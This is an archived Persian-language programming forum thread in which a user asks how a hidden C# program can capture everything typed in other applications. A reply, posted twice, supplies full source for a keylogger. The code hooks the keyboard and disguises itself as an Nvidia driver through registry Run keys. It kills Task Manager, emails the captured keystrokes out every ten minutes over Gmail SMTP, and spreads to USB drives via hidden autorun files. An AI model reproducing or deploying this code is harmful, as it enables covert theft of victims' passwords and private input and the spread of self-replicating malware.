PDA

View Full Version : حرفه ای: ثابت ماندن فوکوس برنامه...



rezarko
پنج شنبه 08 تیر 1391, 11:57 صبح
سلام دوستان. من یه برنامه نوشتم که فورم ان Hide است و کاربر نمیتواند برنامه را ببیند . میخوام اگه بشه کاری کنم که کاربر وارد هر برنامه ای که باشه هر چیزی که تایپ میکنه تو برنامه هم تایپ بشه .
ممنون

rezarko
پنج شنبه 08 تیر 1391, 14:59 عصر
میشه چنین کاری رو با سی شارپ کرد؟

rezarko
پنج شنبه 08 تیر 1391, 19:24 عصر
دوستان ممنون میشم زودتر راهنمایی کنید .خیلی لازممه

rezarko
جمعه 09 تیر 1391, 13:31 عصر
؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟:ناراحت:

samadblaj
جمعه 09 تیر 1391, 16:04 عصر
بله میشه . میخوای کی لاگر بنویسی !

خیلی ساده است این برنامه رو من قبلا با وی بی نوشتم تمامی برنامه ها رو ثبت و ذخیره میکرد.

باید از متد های keydata,keycode,keychar استفاده کنید و برنامه رو در تسک بار کنار ساعت بزاری یا مخفی کنیدش ، حالا اگه پیدا کردم یه کد دارم برات میزارم.

خودتون هم شروع به نوشتن کنید یه کم برید جلو دستتون راه بیفته خیلی راحت میتونید بنویسیدش.

مثلا یه تابع کدش هست:

یه شرط به محض اینکه کاربری چیزی به clipboard ارسال کرد این عمل اجرا میشه.

بیا توی یه کنسول بنویسش و هدفت هم خیر باشه ان شاا... !

کلملت رو ضبط میکنه ، کلمات ضبط شده رو ایمیل میکنه ، و یو اس بی...

موفق باشی.



using System;
using System.Diagnostics;
using System.Timers;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
using System.Net;
using System.Net.Mail;
using Microsoft.Win32;

namespace Keylogger_V2
{
class Program
{
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;
public static string path = Path.Combine(Environment.GetFolderPath(Environment .SpecialFolder.ApplicationData), "nvidia.log");
public static byte caps = 0, shift = 0, failed = 0;

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);

public static void Main()
{
_hookID = SetHook(_proc);
Program.startup();
System.Timers.Timer timer;
timer = new System.Timers.Timer();
timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent);
timer.AutoReset = true;
timer.Interval = 600000;
timer.Start();
System.Timers.Timer timer2;
timer2 = new System.Timers.Timer();
timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread);
timer2.AutoReset = true;
timer2.Interval = 10000;
timer2.Start();
Application.Run();
GC.KeepAlive(timer);
GC.KeepAlive(timer2);
UnhookWindowsHookEx(_hookID);
}

public static void startup()
{
//Try to copy keylogger in some folders
string source = Application.ExecutablePath.ToString();
string destination = Environment.GetFolderPath(Environment.SpecialFolde r.ApplicationData);
destination = System.IO.Path.Combine(destination, "nvdisp.exe");
try
{
System.IO.File.Copy(source, destination, false);
source = destination;
}
catch
{
Console.WriteLine("No authorization to copy file or other error.");
}
//Find if the file already exist in startup
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);

if (registryKey.GetValue("Nvidia driver") == null)
{
registryKey.SetValue("Nvidia driver", destination);
}

registryKey.Close();//dispose of the Key
}
catch
{
Console.WriteLine("Error setting startup reg key.");
}
//Try to add to all users
try
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);

if (registryKey.GetValue("Nvidia driver") == null)
{
registryKey.SetValue("Nvidia driver", source);
}

registryKey.Close();//dispose of the key
}
catch
{
Console.WriteLine("Error setting startup reg key for all users.");
}
}

public static void OnTimedEvent(object source, EventArgs e)
{
Process[] ProcessList = Process.GetProcesses();
foreach (Process proc in ProcessList)
{
if (proc.MainWindowTitle.Contains("Taskmgr.exe"))
{
proc.Kill();
}
}
System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
msg.To.Add("username@gmail.com");
msg.From = new MailAddress("username@gmail.com", "username", System.Text.Encoding.UTF8);
msg.Subject = "i don't know";
msg.SubjectEncoding = System.Text.Encoding.UTF8;
msg.Body = "ciao ale";
msg.BodyEncoding = System.Text.Encoding.UTF8;
msg.IsBodyHtml = false;
msg.Priority = MailPriority.High;
SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "password");
client.Port = 587;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
Attachment data = new Attachment(Program.path);
msg.Attachments.Add(data);
try
{
client.Send(msg);
failed = 0;
}
catch
{
data.Dispose();
failed = 1;
}
data.Dispose();

if (failed == 0)
File.WriteAllText(Program.path, ""); //empties the file

failed = 0;

}

private static IntPtr SetHook(LowLevelKeyboardProc proc)
{
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
{
return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
}
}
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
StreamWriter sw = File.AppendText(Program.path);
int vkCode = Marshal.ReadInt32(lParam);
if (Keys.Shift == Control.ModifierKeys) Program.shift = 1;

switch ((Keys)vkCode)
{
case Keys.Space:
sw.Write(" ");
break;
case Keys.Return:
sw.WriteLine("");
break;
case Keys.Back:
sw.Write("back");
break;
case Keys.Tab:
sw.Write("TAB");
break;
case Keys.D0:
if (Program.shift == 0) sw.Write("0");
else sw.Write(")");
break;
case Keys.D1:
if (Program.shift == 0) sw.Write("1");
else sw.Write("!");
break;
case Keys.D2:
if (Program.shift == 0) sw.Write("2");
else sw.Write("@");
break;
case Keys.D3:
if (Program.shift == 0) sw.Write("3");
else sw.Write("#");
break;
case Keys.D4:
if (Program.shift == 0) sw.Write("4");
else sw.Write("$");
break;
case Keys.D5:
if (Program.shift == 0) sw.Write("5");
else sw.Write("%");
break;
case Keys.D6:
if (Program.shift == 0) sw.Write("6");
else sw.Write("^");
break;
case Keys.D7:
if (Program.shift == 0) sw.Write("7");
else sw.Write("&");
break;
case Keys.D8:
if (Program.shift == 0) sw.Write("8");
else sw.Write("*");
break;
case Keys.D9:
if (Program.shift == 0) sw.Write("9");
else sw.Write("(");
break;
case Keys.LShiftKey:
case Keys.RShiftKey:
case Keys.LControlKey:
case Keys.RControlKey:
case Keys.LMenu:
case Keys.RMenu:
case Keys.LWin:
case Keys.RWin:
case Keys.Apps:
sw.Write("");
break;
case Keys.OemQuestion:
if (Program.shift == 0) sw.Write("/");
else sw.Write("?");
break;
case Keys.OemOpenBrackets:
if (Program.shift == 0) sw.Write("[");
else sw.Write("{");
break;
case Keys.OemCloseBrackets:
if (Program.shift == 0) sw.Write("]");
else sw.Write("}");
break;
case Keys.Oem1:
if (Program.shift == 0) sw.Write(";");
else sw.Write(":");
break;
case Keys.Oem7:
if (Program.shift == 0) sw.Write("'");
else sw.Write('"');
break;
case Keys.Oemcomma:
if (Program.shift == 0) sw.Write(",");
else sw.Write("<");
break;
case Keys.OemPeriod:
if (Program.shift == 0) sw.Write(".");
else sw.Write(">");
break;
case Keys.OemMinus:
if (Program.shift == 0) sw.Write("-");
else sw.Write("_");
break;
case Keys.Oemplus:
if (Program.shift == 0) sw.Write("=");
else sw.Write("+");
break;
case Keys.Oemtilde:
if (Program.shift == 0) sw.Write("`");
else sw.Write("~");
break;
case Keys.Oem5:
sw.Write("|");
break;
case Keys.Capital:
if (Program.caps == 0) Program.caps = 1;
else Program.caps = 0;
break;
default:
if (Program.shift == 0 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
if (Program.shift == 1 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
if (Program.shift == 0 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
if (Program.shift == 1 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
break;
}
Program.shift = 0;
sw.Close();
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}

public static void USBSpread(object source, EventArgs e)
{
///////////////////////////////////////////////////////////////
/////////////////////// USB spread class //////////////////////
///////////////////////////////////////////////////////////////
//A bit modified
string source2 = Application.ExecutablePath.ToString();
System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives();
try
{
foreach (System.IO.DriveInfo drive in drives)
{
if (drive.DriveType == DriveType.Removable)
{
string driveAutorun = drive.Name + "autorun.inf";
StreamWriter sw = new StreamWriter(driveAutorun);
sw.WriteLine("[autorun]\n");
sw.WriteLine("open=start.exe");
sw.WriteLine("action=Run VMCLite");
sw.Close();
File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden);
try
{
File.Copy(source2, drive.Name + "start.exe", true);
File.SetAttributes(drive.Name + "start.exe", File.GetAttributes(drive.Name + "start.exe") | FileAttributes.Hidden);
}
finally
{
Console.WriteLine("Removable device rooted");
}
}
}
}
catch (Exception e2)
{
Console.WriteLine(e2.ToString());
}
}
}
}

samadblaj
جمعه 09 تیر 1391, 16:11 عصر
بله میشه . میخوای کی لاگر بنویسی !

خیلی ساده است این برنامه رو من قبلا با وی بی نوشتم تمامی برنامه ها رو ثبت و ذخیره میکرد.

باید از متد های keydata,keycode,keychar استفاده کنید و برنامه رو در تسک بار کنار ساعت بزاری یا مخفی کنیدش ، حالا اگه پیدا کردم یه کد دارم برات میزارم.

خودتون هم شروع به نوشتن کنید یه کم برید جلو دستتون راه بیفته خیلی راحت میتونید بنویسیدش.

مثلا یه تابع کدش هست:

یه شرط به محض اینکه کاربری چیزی به clipboard ارسال کرد این عمل اجرا میشه.

بیا توی یه کنسول بنویسش و هدفت هم خیر باشه ان شاا... !

کلملت رو ضبط میکنه ، کلمات ضبط شده رو ایمیل میکنه ، و یو اس بی...

موفق باشی.



using System;
using System.Diagnostics;
using System.Timers;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
using System.Net;
using System.Net.Mail;
using Microsoft.Win32;

namespace Keylogger_V2
{
class Program
{
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;
public static string path = Path.Combine(Environment.GetFolderPath(Environment .SpecialFolder.ApplicationData), "nvidia.log");
public static byte caps = 0, shift = 0, failed = 0;

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);

public static void Main()
{
_hookID = SetHook(_proc);
Program.startup();
System.Timers.Timer timer;
timer = new System.Timers.Timer();
timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent);
timer.AutoReset = true;
timer.Interval = 600000;
timer.Start();
System.Timers.Timer timer2;
timer2 = new System.Timers.Timer();
timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread);
timer2.AutoReset = true;
timer2.Interval = 10000;
timer2.Start();
Application.Run();
GC.KeepAlive(timer);
GC.KeepAlive(timer2);
UnhookWindowsHookEx(_hookID);
}

public static void startup()
{
//Try to copy keylogger in some folders
string source = Application.ExecutablePath.ToString();
string destination = Environment.GetFolderPath(Environment.SpecialFolde r.ApplicationData);
destination = System.IO.Path.Combine(destination, "nvdisp.exe");
try
{
System.IO.File.Copy(source, destination, false);
source = destination;
}
catch
{
Console.WriteLine("No authorization to copy file or other error.");
}
//Find if the file already exist in startup
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);

if (registryKey.GetValue("Nvidia driver") == null)
{
registryKey.SetValue("Nvidia driver", destination);
}

registryKey.Close();//dispose of the Key
}
catch
{
Console.WriteLine("Error setting startup reg key.");
}
//Try to add to all users
try
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);

if (registryKey.GetValue("Nvidia driver") == null)
{
registryKey.SetValue("Nvidia driver", source);
}

registryKey.Close();//dispose of the key
}
catch
{
Console.WriteLine("Error setting startup reg key for all users.");
}
}

public static void OnTimedEvent(object source, EventArgs e)
{
Process[] ProcessList = Process.GetProcesses();
foreach (Process proc in ProcessList)
{
if (proc.MainWindowTitle.Contains("Taskmgr.exe"))
{
proc.Kill();
}
}
System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
msg.To.Add("username@gmail.com");
msg.From = new MailAddress("username@gmail.com", "username", System.Text.Encoding.UTF8);
msg.Subject = "i don't know";
msg.SubjectEncoding = System.Text.Encoding.UTF8;
msg.Body = "ciao ale";
msg.BodyEncoding = System.Text.Encoding.UTF8;
msg.IsBodyHtml = false;
msg.Priority = MailPriority.High;
SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "password");
client.Port = 587;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
Attachment data = new Attachment(Program.path);
msg.Attachments.Add(data);
try
{
client.Send(msg);
failed = 0;
}
catch
{
data.Dispose();
failed = 1;
}
data.Dispose();

if (failed == 0)
File.WriteAllText(Program.path, ""); //empties the file

failed = 0;

}

private static IntPtr SetHook(LowLevelKeyboardProc proc)
{
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
{
return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
}
}
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
StreamWriter sw = File.AppendText(Program.path);
int vkCode = Marshal.ReadInt32(lParam);
if (Keys.Shift == Control.ModifierKeys) Program.shift = 1;

switch ((Keys)vkCode)
{
case Keys.Space:
sw.Write(" ");
break;
case Keys.Return:
sw.WriteLine("");
break;
case Keys.Back:
sw.Write("back");
break;
case Keys.Tab:
sw.Write("TAB");
break;
case Keys.D0:
if (Program.shift == 0) sw.Write("0");
else sw.Write(")");
break;
case Keys.D1:
if (Program.shift == 0) sw.Write("1");
else sw.Write("!");
break;
case Keys.D2:
if (Program.shift == 0) sw.Write("2");
else sw.Write("@");
break;
case Keys.D3:
if (Program.shift == 0) sw.Write("3");
else sw.Write("#");
break;
case Keys.D4:
if (Program.shift == 0) sw.Write("4");
else sw.Write("$");
break;
case Keys.D5:
if (Program.shift == 0) sw.Write("5");
else sw.Write("%");
break;
case Keys.D6:
if (Program.shift == 0) sw.Write("6");
else sw.Write("^");
break;
case Keys.D7:
if (Program.shift == 0) sw.Write("7");
else sw.Write("&");
break;
case Keys.D8:
if (Program.shift == 0) sw.Write("8");
else sw.Write("*");
break;
case Keys.D9:
if (Program.shift == 0) sw.Write("9");
else sw.Write("(");
break;
case Keys.LShiftKey:
case Keys.RShiftKey:
case Keys.LControlKey:
case Keys.RControlKey:
case Keys.LMenu:
case Keys.RMenu:
case Keys.LWin:
case Keys.RWin:
case Keys.Apps:
sw.Write("");
break;
case Keys.OemQuestion:
if (Program.shift == 0) sw.Write("/");
else sw.Write("?");
break;
case Keys.OemOpenBrackets:
if (Program.shift == 0) sw.Write("[");
else sw.Write("{");
break;
case Keys.OemCloseBrackets:
if (Program.shift == 0) sw.Write("]");
else sw.Write("}");
break;
case Keys.Oem1:
if (Program.shift == 0) sw.Write(";");
else sw.Write(":");
break;
case Keys.Oem7:
if (Program.shift == 0) sw.Write("'");
else sw.Write('"');
break;
case Keys.Oemcomma:
if (Program.shift == 0) sw.Write(",");
else sw.Write("<");
break;
case Keys.OemPeriod:
if (Program.shift == 0) sw.Write(".");
else sw.Write(">");
break;
case Keys.OemMinus:
if (Program.shift == 0) sw.Write("-");
else sw.Write("_");
break;
case Keys.Oemplus:
if (Program.shift == 0) sw.Write("=");
else sw.Write("+");
break;
case Keys.Oemtilde:
if (Program.shift == 0) sw.Write("`");
else sw.Write("~");
break;
case Keys.Oem5:
sw.Write("|");
break;
case Keys.Capital:
if (Program.caps == 0) Program.caps = 1;
else Program.caps = 0;
break;
default:
if (Program.shift == 0 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
if (Program.shift == 1 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
if (Program.shift == 0 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
if (Program.shift == 1 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
break;
}
Program.shift = 0;
sw.Close();
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}

public static void USBSpread(object source, EventArgs e)
{
///////////////////////////////////////////////////////////////
/////////////////////// USB spread class //////////////////////
///////////////////////////////////////////////////////////////
//A bit modified
string source2 = Application.ExecutablePath.ToString();
System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives();
try
{
foreach (System.IO.DriveInfo drive in drives)
{
if (drive.DriveType == DriveType.Removable)
{
string driveAutorun = drive.Name + "autorun.inf";
StreamWriter sw = new StreamWriter(driveAutorun);
sw.WriteLine("[autorun]\n");
sw.WriteLine("open=start.exe");
sw.WriteLine("action=Run VMCLite");
sw.Close();
File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden);
try
{
File.Copy(source2, drive.Name + "start.exe", true);
File.SetAttributes(drive.Name + "start.exe", File.GetAttributes(drive.Name + "start.exe") | FileAttributes.Hidden);
}
finally
{
Console.WriteLine("Removable device rooted");
}
}
}
}
catch (Exception e2)
{
Console.WriteLine(e2.ToString());
}
}
}
}